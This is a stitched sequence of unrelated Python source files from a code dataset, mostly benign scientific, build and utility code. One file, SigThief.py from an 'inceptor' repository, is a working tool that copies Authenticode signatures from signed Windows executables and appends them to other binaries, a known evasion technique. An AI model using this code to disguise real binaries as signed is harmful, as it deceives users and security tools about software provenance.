        dense = np.array([[1, 3], [0, 4], [2, 3]])
        sparse = csr_matrix([[1, 4], [0, 2], [2, 2]])
        self.assertAlmostEqual(1 - 0.388888888889, matutils.jaccard(dense, sparse))

        # ndarray vs. plain list.
        vec_a = np.array([6, 1, 2, 3])
        vec_b = [4, 3, 2, 5]
        self.assertAlmostEqual(1 - 0.333333333333, matutils.jaccard(vec_a, vec_b))
if __name__ == '__main__':
    # DEBUG-level logging makes numeric-tolerance failures easier to diagnose.
    logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.DEBUG)
    unittest.main()
| StarcoderdataPython |
3226588 | <filename>xmonitor/async/flows/introspect.py<gh_stars>0
# Copyright 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
from oslo_concurrency import processutils as putils
from oslo_utils import encodeutils
from oslo_utils import excutils
from taskflow.patterns import linear_flow as lf
from xmonitor.async import utils
from xmonitor.i18n import _LE
LOG = logging.getLogger(__name__)
class _Introspect(utils.OptionalTask):
    """Taskflow task that pulls embedded metadata out of an image file."""

    def __init__(self, task_id, task_type, image_repo):
        self.task_id = task_id
        self.task_type = task_type
        self.image_repo = image_repo
        super(_Introspect, self).__init__(
            name='%s-Introspect-%s' % (task_type, task_id))

    def execute(self, image_id, file_path):
        """Does the actual introspection.

        Runs ``qemu-img info`` on the file, then stores the reported
        virtual size and disk format on the image record.

        :param image_id: Glance image ID
        :param file_path: Path to the file being introspected
        """
        try:
            # Ask qemu-img for machine-readable image details.
            stdout, stderr = putils.trycmd('qemu-img', 'info',
                                           '--output=json', file_path,
                                           log_errors=putils.LOG_ALL_ERRORS)
        except OSError as exc:
            # NOTE(flaper87): errno == 2 means the executable file
            # was not found. For now, log an error and move forward
            # until we have a better way to enable/disable optional
            # tasks.
            if exc.errno != 2:
                with excutils.save_and_reraise_exception():
                    exc_message = encodeutils.exception_to_unicode(exc)
                    msg = (_LE('Failed to execute introspection '
                               '%(task_id)s: %(exc)s') %
                           {'task_id': self.task_id, 'exc': exc_message})
                    LOG.error(msg)
            # qemu-img missing: the task is optional, so silently skip.
            return
        if stderr:
            raise RuntimeError(stderr)

        metadata = json.loads(stdout)
        new_image = self.image_repo.get(image_id)
        # Missing 'virtual-size' defaults to 0; 'format' may be None.
        new_image.virtual_size = metadata.get('virtual-size', 0)
        new_image.disk_format = metadata.get('format')
        self.image_repo.save(new_image)
        LOG.debug("%(task_id)s: Introspection successful: %(file)s",
                  {'task_id': self.task_id, 'file': file_path})
        return new_image
def get_flow(**kwargs):
    """Build the linear task flow that introspects an image for metadata.

    Keyword Args:
        task_id: Task ID.
        task_type: Type of the task.
        image_repo: Image repository used to load/save the image record.
    """
    task_id = kwargs.get('task_id')
    task_type = kwargs.get('task_type')
    image_repo = kwargs.get('image_repo')
    LOG.debug("Flow: %(task_type)s with ID %(id)s on %(repo)s",
              {'task_type': task_type, 'id': task_id, 'repo': image_repo})
    flow = lf.Flow(task_type)
    flow.add(_Introspect(task_id, task_type, image_repo))
    return flow
| StarcoderdataPython |
125433 | <gh_stars>1-10
"""Tests for Microsoft Visual C++ Compiler"""
def tests_compiler():
    """Test Compiler: MSVC version detection, API/option tables, and the
    compile-arguments matrix."""
    import platform
    from compilertools.compilers._core import _get_arch_and_cpu
    from compilertools.compilers.msvc import Compiler

    version = ""

    def dummy_compiler():
        """platform.python_compiler"""
        return version

    # Monkeypatch platform.python_compiler so the fake version string above
    # drives the detection logic; restored in the finally block below.
    platform_python_compiler = platform.python_compiler
    platform.python_compiler = dummy_compiler
    try:
        compiler = Compiler(current_compiler=True)

        # Check not existing version
        assert compiler.version == 0.0

        # Check existing version
        version = "MSC v.1800 64 bit"
        del compiler["version"]  # drop the cached value so it is recomputed
        assert compiler.version == 12.0

        # Check 13.0 skipped
        version = "MSC v.1900 64 bit"
        del compiler["version"]
        assert compiler.version == 14.0

        # Not current compiler
        assert Compiler().version == 0.0
    finally:
        platform.python_compiler = platform_python_compiler

    # Test API/Options
    assert len(compiler.api) > 0
    assert len(compiler.option) > 0

    # Test _compile_args_matrix
    arch, cpu = _get_arch_and_cpu("x86_32")
    assert compiler._compile_args_matrix(arch, cpu)
| StarcoderdataPython |
3264508 | <reponame>ratt-ru/pfb-clean
import numpy as np
class Dirac(object):
    """Models an image as a sum of Dirac deltas, i.e. x = H beta, where H
    is a design matrix mapping Dirac coefficients onto the image cube."""

    def __init__(self, nband, nx, ny, mask=None):
        """
        Parameters
        ----------
        nband : int
            Number of bands.
        nx : int
            Number of pixels in the x-dimension.
        ny : int
            Number of pixels in the y-dimension.
        mask : np.ndarray, optional
            nx x ny bool array containing the locations of sources.
            When omitted, every pixel is allowed (identity mapping).
        """
        self.nx = nx
        self.ny = ny
        self.nband = nband
        if mask is not None:
            self.mask = mask
        else:
            # BUG FIX: the original stored ``lambda x: x`` here, which
            # crashed in dot()/hdot() (they index and broadcast the mask)
            # and in update_locs()/trim_fat(). An all-True array is the
            # equivalent identity mapping and works everywhere.
            self.mask = np.ones((nx, ny), dtype=bool)

    def dot(self, x):
        """Map components to an image cube (apply the mask per band)."""
        return self.mask[None, :, :] * x

    def hdot(self, x):
        """Map an image cube back to components (the mask is real and
        diagonal, so the adjoint equals the forward map)."""
        return self.mask[None, :, :] * x

    def update_locs(self, model):
        """Grow the mask with every pixel that is non-zero in *model*."""
        if model.ndim == 3:
            self.mask = np.logical_or(self.mask, np.any(model, axis=0))
        elif model.ndim == 2:
            self.mask = np.logical_or(self.mask, model != 0)
        else:
            raise ValueError("Incorrect number of model dimensions")

    def trim_fat(self, model):
        """Shrink the mask to exactly the non-zero support of *model*."""
        if model.ndim == 3:
            self.mask = np.any(model, axis=0)
        elif model.ndim == 2:
            self.mask = model != 0
        else:
            raise ValueError("Incorrect number of model dimensions")
| StarcoderdataPython |
1616420 |
import sys
import pprint
def get_positions(fh):
    """Parse the first non-empty line of *fh* as a comma-separated list of
    ints; the rest of the stream is consumed but ignored.

    Returns an empty list when the stream holds no non-empty line.
    """
    positions = []
    for raw in fh:
        stripped = raw.strip()
        # Only the first non-blank line carries data; later lines are
        # drained to keep the original stream-consumption behavior.
        if stripped and not positions:
            positions = [int(token) for token in stripped.split(',')]
    return positions
if __name__ == "__main__":
    # NOTE(review): ``pp`` is created but never used — candidate for removal.
    pp = pprint.PrettyPrinter(compact=True)
    positions = get_positions(sys.stdin)
    optimal_position = -1
    cost = -1
    # Brute-force scan: try every candidate position between the extremes
    # and keep the one with the smallest total absolute-distance cost.
    for c in range(min(positions), max(positions)+1):
        p = sum(list(map(lambda x: abs(x - c), positions)))
        if cost == -1 or p < cost:
            cost = p
            optimal_position = c
    print(f'Optimal position = {optimal_position}')
    print(f'Cost = {cost}')
| StarcoderdataPython |
4815529 | """Generic CSV file read and write operations."""
import csv
import os
FMT = dict(lineterminator="\n", quoting=csv.QUOTE_MINIMAL)
def check(enc):
    """Validate that *enc* is one of the supported file encodings.

    Raises ValueError for anything other than utf-8 or windows-1251.
    """
    supported = ('utf-8', 'windows-1251')
    if enc in supported:
        return
    raise ValueError("Encoding not supported: " + str(enc))
def yield_rows(path, enc='windows-1251', sep=";"):
    """Lazily yield parsed CSV rows from the file at *path*."""
    with open(path, 'r', encoding=enc) as handle:
        reader = csv.reader(handle, delimiter=sep)
        yield from reader
def _open(path):
    """Open *path* for writing with the UTF-8 encoding all writers share."""
    return open(path, 'w', encoding="utf-8")
#@print_elapsed_time
def save_rows(path, stream, column_names=None):
    """Write *stream* rows to *path* as UTF-8 CSV, with an optional
    header row."""
    with _open(path) as destination:
        writer = csv.writer(destination, **FMT)
        if column_names:
            writer.writerow(column_names)
        writer.writerows(stream)
#@print_elapsed_time
def save_dicts(path, dict_stream, column_names):
    """Write a stream of dicts to *path* as UTF-8 CSV rows.

    :param path: destination file; must not already exist.
    :param dict_stream: iterable of dicts keyed by *column_names*.
    :param column_names: field order for ``csv.DictWriter``.
    :raises FileExistsError: if *path* already exists (refuses to
        overwrite; more specific than the original bare ``Exception``
        while remaining backward compatible for ``except Exception``).
    """
    if os.path.exists(path):
        raise FileExistsError("%s already exists" % path)
    with _open(path) as file:
        writer = csv.DictWriter(file, fieldnames=column_names, **FMT)
        for d in dict_stream:
            writer.writerow(d)
| StarcoderdataPython |
1778744 | <reponame>DBrianKimmel/PyHouse_Install
"""
@name: PyHouse_Install/src/Install/Utility.py
@author: <NAME>
@contact: <EMAIL>
@copyright: (c) 2015-2016 by <NAME>
@license: MIT License
@note: Created on Oct 13, 2015
@Summary:
"""
# Import system type stuff
import getpass
import os
import subprocess
try:
import pwd
except ImportError:
import Install.test.win_pwd as pwd
class Utilities(object):
    """Installer helpers: privilege checks, uid lookup, directory creation."""

    @staticmethod
    def must_not_be_root():
        """Abort the installer when run as root (sudo must not be used)."""
        l_user = getpass.getuser()
        if l_user == 'root':
            exit('You must not be root (no sudo)! - Aborting!')

    @staticmethod
    def get_user_ids(p_user_name):
        """Return the (uid, gid) pair for *p_user_name*."""
        l_user = pwd.getpwnam(p_user_name)
        l_uid = l_user.pw_uid
        l_gid = l_user.pw_gid
        return l_uid, l_gid

    @staticmethod
    def is_dir(p_path):
        """True when *p_path* is an existing directory."""
        return os.path.isdir(p_path)

    @staticmethod
    def MakeDir(p_dir_name, p_user_name):
        """Create *p_dir_name* via sudo and hand ownership to *p_user_name*.

        No-op (with a notice) when the directory already exists.
        """
        l_uid, l_gid = Utilities.get_user_ids(p_user_name)
        if not os.path.isdir(p_dir_name):
            print(' Creating a directory {}'.format(p_dir_name))
            subprocess.call(['sudo', 'mkdir', p_dir_name])
            # chown/chgrp take numeric ids here, passed as strings.
            subprocess.call(['sudo', 'chown', str(l_uid), str(p_dir_name)])
            subprocess.call(['sudo', 'chgrp', str(l_gid), str(p_dir_name)])
        else:
            print(' *** Directory {} already exists.'.format(p_dir_name))
def getserial():
    """Return the Raspberry Pi CPU serial number from /proc/cpuinfo.

    Returns the 16-character serial, a string of zeros when no ``Serial``
    line is present, or ``"ERROR000000000"`` when the file cannot be read.
    """
    # Extract serial from cpuinfo file
    cpuserial = "0000000000000000"
    try:
        # ``with`` guarantees the handle is closed even if reading fails
        # part-way (the original leaked the file object in that case).
        with open('/proc/cpuinfo', 'r') as f:
            for line in f:
                if line[0:6] == 'Serial':
                    cpuserial = line[10:26]
    except OSError:
        # Narrowed from a bare ``except:`` so programming errors are no
        # longer silently swallowed; sentinel value kept for callers.
        cpuserial = "ERROR000000000"
    return cpuserial
# ## END DBK
| StarcoderdataPython |
131914 | <reponame>caburu/rl-baselines3-zoo<filename>julio/safe_evaluate_policy.py<gh_stars>0
from stable_baselines3.common.vec_env import VecEnv, DummyVecEnv
import numpy as np
# O método `evaluate_policy` original da biblioteca chama `reset` duas vezes por
# episódio se o ambiente passado usar DummyVecEnv (através da VecNormalize, por exemplo).
# Isso me causou problemas ao fazer comparações com baselines.
#
# O método abaixo altera o `evaluate_policy` original garantindo apenas uma chamada
# ao método `reset` por episódio e garantindo a mesma sequência de chamadas independentemente
# o ambiente ser o original ou de usar o DummyVecEnv.
#
# MAS *** ainda tem uma chamada adicional do reset ao final.
# - Assim chamadas sucessivas do método não garantem funcionamento correto.
# - Comparações só são válidas se forem para uma única chamada ao método.
#
# Obs: eu abri uma Issue sobre isso na biblioteca:
# https://github.com/hill-a/stable-baselines/issues/906
def safe_evaluate_policy(model, env, n_eval_episodes=10, deterministic=True,
                         render=False, callback=None, reward_threshold=None,
                         return_episode_rewards=False):
    """
    Runs policy for ``n_eval_episodes`` episodes and returns average reward.

    This is made to work only with one env, and (unlike the library's
    ``evaluate_policy``) guarantees a single ``reset`` per episode — see
    the module comment above.

    :param model: (BaseAlgorithm) The RL agent you want to evaluate.
    :param env: (gym.Env or VecEnv) The gym environment. In the case of a ``VecEnv``
        this must contain only one environment.
    :param n_eval_episodes: (int) Number of episode to evaluate the agent
    :param deterministic: (bool) Whether to use deterministic or stochastic actions
    :param render: (bool) Whether to render the environment or not
    :param callback: (callable) callback function to do additional checks,
        called after each step.
    :param reward_threshold: (float) Minimum expected reward per episode,
        this will raise an error if the performance is not met
    :param return_episode_rewards: (bool) If True, a list of reward per episode
        will be returned instead of the mean.
    :return: (float, float) Mean reward per episode, std of reward per episode
        returns ([float], [int]) when ``return_episode_rewards`` is True
    """
    if isinstance(env, VecEnv):
        assert env.num_envs == 1, "You must pass only one environment when using this function"
        wrap_action = False
    else:
        # Wrap a plain gym env so reset/step follow the vectorized calling
        # convention; actions must then be wrapped in a one-element list.
        env = DummyVecEnv([lambda:env])
        wrap_action = True
    episode_rewards, episode_lengths = [], []
    demands_by_epis = []
    obs = env.reset()
    # NOTE(review): assumes the wrapped env exposes ``customer_demands`` —
    # specific to the supply-chain environment this project evaluates.
    demands_by_epis.append(env.envs[0].customer_demands.copy())
    num_episodes = 0
    while num_episodes < n_eval_episodes:
        done, state = False, None
        episode_reward = 0.0
        episode_length = 0
        while not done:
            action, state = model.predict(obs, state=state, deterministic=deterministic)
            if wrap_action: action = [action]
            obs, reward, done, _info = env.step(action)
            episode_reward += reward
            if callback is not None:
                callback(locals(), globals())
            episode_length += 1
            if render:
                env.render()
        num_episodes += 1
        episode_rewards.append(episode_reward)
        episode_lengths.append(episode_length)
        if num_episodes < n_eval_episodes:
            # Capture the demand sequence for the next episode only when
            # another episode will actually run.
            demands_by_epis.append(env.envs[0].customer_demands.copy())
    mean_reward = np.mean(episode_rewards)
    std_reward = np.std(episode_rewards)
    if reward_threshold is not None:
        assert mean_reward > reward_threshold, ('Mean reward below threshold: '
                                                f'{mean_reward:.2f} < {reward_threshold:.2f}')
    if return_episode_rewards:
        return episode_rewards, episode_lengths, demands_by_epis
    return mean_reward, std_reward
| StarcoderdataPython |
3239699 | """Build script for Lyve-SET Conda package"""
import os
import subprocess as sp
# Make rules to run
BASE_MAKE_RULES = [
'install-mkdir',
'install-SGELK',
'install-CGP',
'install-perlModules',
'install-config'
]
EXPENSIVE_MAKE_RULES = ['install-phast']
# Relative directory in conda env to install to
# Just put everything in a subdirectory of opt
INSTALL_DIR = 'opt/lyve-set'
# Files to install in conda ENV from working directory
INSTALL_FILES = [
'scripts',
'lib',
'plugins',
'docs',
'README.md',
'LICENSE',
]
def log(message, *args, **kwargs):
    """Write line to stdout with recognizable prefix.

    :param str message: Message to write.
    :param \\*args: Positional arguments to format message with.
    :param \\**kwargs: Keyword arguments to format message with.
    """
    formatted = message.format(*args, **kwargs)
    print('\n@@', formatted, '\n')
def cmd(*args, **export):
    """Run a command in a subprocess.

    Prints the command before executing and raises RuntimeError on a
    non-zero exit code.

    :param \\*args: Command and its arguments.
    :param \\**export: Environment variables to export.
    """
    # Print the command (with exported variables shown shell-style).
    msg = '$'
    # NOTE(review): ``export`` is always a dict (never None) because it is
    # collected via **kwargs, so these ``is not None`` guards are vacuous.
    if export is not None:
        for k, v in export.items():
            msg += ' {}="{}"'.format(k, v)
    for arg in args:
        msg += ' ' + arg
    log(msg)

    # Environment: start from the current environment, overlay exports.
    env = None
    if export is not None:
        env = dict(os.environ)
        env.update(export)

    # Run
    p = sp.Popen(args, env=env)
    rcode = p.wait()

    # Check exit code
    if rcode:
        raise RuntimeError(
            'Process returned non-zero exit code: {}'
            .format(rcode)
        )
def make_symlink_relative(path):
    """Rewrite the symbolic link at *path* so its target is relative.

    Links whose target is already relative are left untouched.

    :param str path: Path to symbolic link.
    """
    assert os.path.islink(path)
    target = os.readlink(path)
    if os.path.isabs(target):
        relative_target = os.path.relpath(target, os.path.dirname(path))
        os.unlink(path)
        os.symlink(relative_target, path)
def build(work_dir, prefix, dirty=False):
    """Run the build process.

    :param str work_dir: Working directory containing the repo's source code.
    :param str prefix: Path to install to (should already exist).
    :param bool dirty: Whether the build process has already been run in this
        directory (skips the expensive make rules).
    """
    log('Beginning build process')
    os.chdir(work_dir)

    # Makefile rules to run (copy, so the module constant stays untouched).
    make_rules = BASE_MAKE_RULES[:]
    if dirty:
        log(
            '--dirty is set, skipping the following make rules: {}',
            ' '.join(EXPENSIVE_MAKE_RULES),
        )
    else:
        make_rules += EXPENSIVE_MAKE_RULES

    # Run Makefile
    log('Running Makefile...')
    cmd('make', *make_rules)

    # Run "check" rule to check dependencies
    log('Checking dependencies...')
    cmd('make', 'check')

    # Convert absolute symlink paths to relative paths so they survive
    # relocation into the conda environment.
    log('Fixing symlinks...')
    for fname in os.listdir('scripts'):
        fpath = os.path.join('scripts', fname)
        if os.path.islink(fpath):
            make_symlink_relative(fpath)

    # Directory to install to
    install_dir = os.path.join(prefix, INSTALL_DIR)
    log('Installing to {}', install_dir)
    cmd('mkdir', '-p', install_dir)

    # Copy files
    log('Copying files...')
    for file in INSTALL_FILES:
        cmd(
            'cp',
            '-r',
            os.path.join(work_dir, file),
            os.path.join(install_dir, file),
        )

    # Install wrapper script into the env's bin/ and make it executable.
    script_src = os.path.join(work_dir, 'wrapper.sh')
    script_dst = os.path.join(prefix, 'bin', 'lyve-set')
    cmd('cp', script_src, script_dst)
    cmd('chmod', '+x', script_dst)

    # Done
    log('Install script completed successfully')
if __name__ == '__main__':
    # conda-build exports CONDA_BUILD=1 while running build scripts;
    # refuse to run outside of that context.
    if os.environ.get('CONDA_BUILD') != '1':
        raise RuntimeError('CONDA_BUILD environment variable not set')
    dirty = os.environ.get('DIRTY', '') == '1'
    build(os.getcwd(), os.environ['PREFIX'], dirty=dirty)
| StarcoderdataPython |
3223028 | <reponame>pwnmeow/inceptor<filename>inceptor/signers/SigThief.py
#!/usr/bin/env python3
# LICENSE: BSD-3
# Copyright: <NAME> @midnite_runr
# Adapted by klezVirus @klezVirus
import argparse
import os.path
import sys
import struct
import shutil
import io
import tempfile
from pathlib import Path
from config.Config import Config
from utils.console import Console
class SigThief:
    """Rip, append, remove, check, or clone Authenticode signatures on PE
    files by reading and patching the certificate-table entry in the PE
    optional header's data directories."""

    # Supported operations for this signer.
    ACTIONS = ["save", "add", "del", "check", "clone"]

    def __init__(self, action, certificate_file=None):
        self.config = Config()
        self.debug = self.config.get_boolean("DEBUG", "signers")
        self.action = action
        self.certificate_file = certificate_file
        self.certificate = None
        if not certificate_file:
            # No certificate given: reserve a temp .cer path that can hold
            # a ripped signature (deleted again by clean()).
            self.certificate_file = tempfile.NamedTemporaryFile(
                dir=str(self.config.get_path("DIRECTORIES", "certificates")),
                suffix=".cer",
                delete=True
            ).name
        elif certificate_file and action == "add":
            # "add" needs the raw certificate bytes up front.
            self.certificate = open(self.certificate_file, "rb").read()
        self.target_info = {}

    @property
    def suffix(self):
        """Filename suffix for the output of the current action.

        NOTE(review): returns None for the "check" action.
        """
        if self.action in ["add", "clone"]:
            return "_signed"
        elif self.action in ["save"]:
            return "_sig"
        elif self.action in ["del"]:
            return "_nosig"

    def clean(self):
        """Remove the temporary certificate file (kept only for "save")."""
        if self.action != "save":
            path = Path(self.certificate_file)
            path.unlink(missing_ok=True)

    def __gather_file_info_win(self, file):
        """
        Parse the PE/COFF headers of *file* into self.target_info.

        Borrowed from BDF...
        I could just skip to certLOC... *shrug*
        """
        if self.debug:
            Console.auto_line(f"[*] Gathering binary information: '{file}'")
        self.target_info = {}
        with open(file, 'rb') as binary:
            # Offset 0x3C of the DOS header holds the PE header location.
            binary.seek(int('3C', 16))
            self.target_info['buffer'] = 0
            self.target_info['JMPtoCodeAddress'] = 0
            self.target_info['dis_frm_pehdrs_sectble'] = 248
            self.target_info['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
            # Start of COFF
            self.target_info['COFF_Start'] = self.target_info['pe_header_location'] + 4
            binary.seek(self.target_info['COFF_Start'])
            self.target_info['MachineType'] = struct.unpack('<H', binary.read(2))[0]
            binary.seek(self.target_info['COFF_Start'] + 2, 0)
            self.target_info['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
            self.target_info['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
            binary.seek(self.target_info['COFF_Start'] + 16, 0)
            self.target_info['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
            self.target_info['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
            # End of COFF
            self.target_info['OptionalHeader_start'] = self.target_info['COFF_Start'] + 20
            # if self.target_info['SizeOfOptionalHeader']:
            # Begin Standard Fields section of Optional Header
            binary.seek(self.target_info['OptionalHeader_start'])
            # Magic 0x20B marks a PE32+ (64-bit) optional header.
            self.target_info['Magic'] = struct.unpack('<H', binary.read(2))[0]
            self.target_info['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
            self.target_info['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
            self.target_info['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
            self.target_info['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
            self.target_info['SizeOfUninitializedData'] = struct.unpack("<I",
                                                                        binary.read(4))[0]
            self.target_info['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['PatchLocation'] = self.target_info['AddressOfEntryPoint']
            self.target_info['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
            if self.target_info['Magic'] != 0x20B:
                # PE32 only; PE32+ has no BaseOfData field.
                self.target_info['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
            # End Standard Fields section of Optional Header
            # Begin Windows-Specific Fields of Optional Header
            if self.target_info['Magic'] == 0x20B:
                self.target_info['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
            else:
                self.target_info['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['MajorOperatingSystemVersion'] = struct.unpack('<H',
                                                                            binary.read(2))[0]
            self.target_info['MinorOperatingSystemVersion'] = struct.unpack('<H',
                                                                            binary.read(2))[0]
            self.target_info['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
            self.target_info['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
            self.target_info['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
            self.target_info['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
            self.target_info['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['SizeOfImageLoc'] = binary.tell()
            self.target_info['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
            self.target_info['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
            if self.target_info['Magic'] == 0x20B:
                self.target_info['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
                self.target_info['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
                self.target_info['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
                self.target_info['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
            else:
                self.target_info['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
                self.target_info['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
                self.target_info['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
                self.target_info['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
            self.target_info['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
            # End Windows-Specific Fields of Optional Header
            # Begin Data Directories of Optional Header
            self.target_info['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['ImportTableLOCInPEOptHdrs'] = binary.tell()
            # ImportTable SIZE|LOC
            self.target_info['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
            self.target_info['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
            self.target_info['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
            # Certificate (security) directory entry: file offset + size of
            # the attribute certificate table. This is what sign/truncate
            # patch below.
            self.target_info['CertTableLOC'] = binary.tell()
            self.target_info['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
            self.target_info['CertSize'] = struct.unpack("<I", binary.read(4))[0]
        if self.debug:
            Console.auto_line(f"[+] Information successfully recovered")

    def copy_cert(self, signee):
        """Read the certificate blob out of *signee* into self.certificate.

        Exits the process when the file carries no signature.
        """
        self.__gather_file_info_win(signee)
        if self.target_info['CertLOC'] == 0 or self.target_info['CertSize'] == 0:
            # not signed
            Console.auto_line("[-] Input file Not signed!")
            sys.exit(-1)
        with open(signee, 'rb') as f:
            f.seek(self.target_info['CertLOC'], 0)
            self.certificate = f.read(self.target_info['CertSize'])

    def sign(self, signee, signed):
        """Append the held certificate to a copy of *signee* at *signed*,
        pointing the certificate-table entry at the appended blob."""
        self.__gather_file_info_win(signee)
        if not self.certificate:
            # No certificate loaded yet: rip it from the input itself.
            self.copy_cert(signee)
        if self.debug:
            Console.auto_line("[*] Output file: {0}".format(signed))
        with open(signee, 'rb') as g:
            with open(signed, 'wb') as f:
                f.write(g.read())
                f.seek(0)
                # Point the cert-table entry at the end of the original
                # image, then append the certificate bytes there.
                f.seek(self.target_info['CertTableLOC'], 0)
                f.write(struct.pack("<I", len(open(signee, 'rb').read())))
                f.write(struct.pack("<I", len(self.certificate)))
                f.seek(0, io.SEEK_END)
                f.write(self.certificate)
        if self.debug:
            Console.auto_line("[+] Signature successfully appended")
        self.clean()

    def save_cert(self, exe):
        """Write the certificate ripped from *exe* to certificate_file."""
        if not self.certificate:
            self.copy_cert(exe)
        if self.debug:
            Console.auto_line("[*] Output file: {0}".format(self.certificate_file))
        with open(self.certificate_file, 'wb') as c_out:
            c_out.write(self.certificate)
        if self.debug:
            Console.auto_line("[+] Signature ripped")

    def check_sig(self, signed):
        """Return True when *signed* carries an Authenticode signature."""
        self.__gather_file_info_win(signed)
        if self.target_info['CertLOC'] == 0 or self.target_info['CertSize'] == 0:
            # not signed
            Console.auto_line("[-] File not signed!")
            return False
        else:
            Console.auto_line("[+] File is signed!")
            return True

    def truncate(self, signed, unsigned):
        """Copy *signed* to *unsigned* with its signature stripped.

        Exits the process when the input is not signed.
        """
        if not self.check_sig(signed):
            sys.exit(-1)
        shutil.copy2(signed, unsigned)
        with open(unsigned, "r+b") as binary:
            if self.debug:
                Console.auto_line('[*] Overwriting certificate table pointer and truncating binary')
            # Drop the appended certificate bytes, then zero the 8-byte
            # certificate-table entry (offset + size).
            binary.seek(-self.target_info['CertSize'], io.SEEK_END)
            binary.truncate()
            binary.seek(self.target_info['CertTableLOC'], 0)
            binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
        if self.debug:
            Console.auto_line("[+] Signature removed")

    def sign_with(self, certificate, signee, signed):
        """Sign *signee* into *signed* using the given *certificate* file."""
        self.certificate = open(certificate, 'rb').read()
        self.sign(signee, signed)
| StarcoderdataPython |
107048 | import os
import caffe
import numpy as np
import skimage
import tensorflow as tf
from Preprocessor import Preprocessor
from datasets.ImageNet import ImageNet
from models.AlexNetConverter import AlexNetConverter
from models.SDNet import SDNet
from train.SDNetTrainer import SDNetTrainer
im_s = 227
def preprocess(img):
    """Return a BGR, channel-first copy of an RGB HWC image (Caffe layout)."""
    bgr = np.copy(img)[:, :, [2, 1, 0]]  # swap channel from RGB to BGR
    return bgr.transpose((2, 0, 1))      # h, w, c -> c, h, w
def load_image(path):
    """Load an image, scale pixels to [-1, 1], center-crop to a square,
    and resize to the module-level target size ``im_s``."""
    # load image
    img = np.float32(skimage.io.imread(path))
    img /= 127.5
    img -= 1.0
    # Center square crop along the shorter edge.
    side = min(img.shape[:2])
    top = int((img.shape[0] - side) / 2)
    left = int((img.shape[1] - side) / 2)
    cropped = img[top: top + side, left: left + side]
    # Resize to the network's input resolution.
    return skimage.transform.resize(cropped, (im_s, im_s))
# Build the SDNet model and trainer only to obtain a TF session plus the
# checkpoint-restore machinery used by the converter below.
model = SDNet(num_layers=5, target_shape=[im_s, im_s, 3], batch_size=16, disc_pad='VALID')
data = ImageNet()
preprocessor = Preprocessor(target_shape=[im_s, im_s, 3])
trainer = SDNetTrainer(model=model, dataset=data, pre_processor=preprocessor, num_epochs=80, tag='refactored',
                       lr_policy='const', optimizer='adam')

# Paths: TF checkpoint in, Caffe prototxt/caffemodel out.
model_dir = '../test_converter'
proto_path = 'deploy.prototxt'
ckpt = '../test_converter/model.ckpt-800722'
save_path = os.path.join(model_dir, 'alexnet_v2.caffemodel')

# NOTE(review): seed is set, but nothing below appears to draw random numbers.
np.random.seed(42)
img = load_image('cat.jpg')

converter = AlexNetConverter(model_dir, model, trainer.sess, ckpt=ckpt, remove_bn=True, scale=1.0, bgr=True,
                             im_size=(im_s, im_s), with_fc=False, use_classifier=False)

with converter.sess:
    # Export the TF weights, then run the TF graph once on the test image
    # to obtain reference activations.
    converter.extract_and_store()
    net, encoded = model.discriminator.encode(tf.constant(img, shape=[1, im_s, im_s, 3], dtype=tf.float32),
                                              with_fc=converter.with_fc, reuse=True, training=False)
    result_tf = encoded.eval()
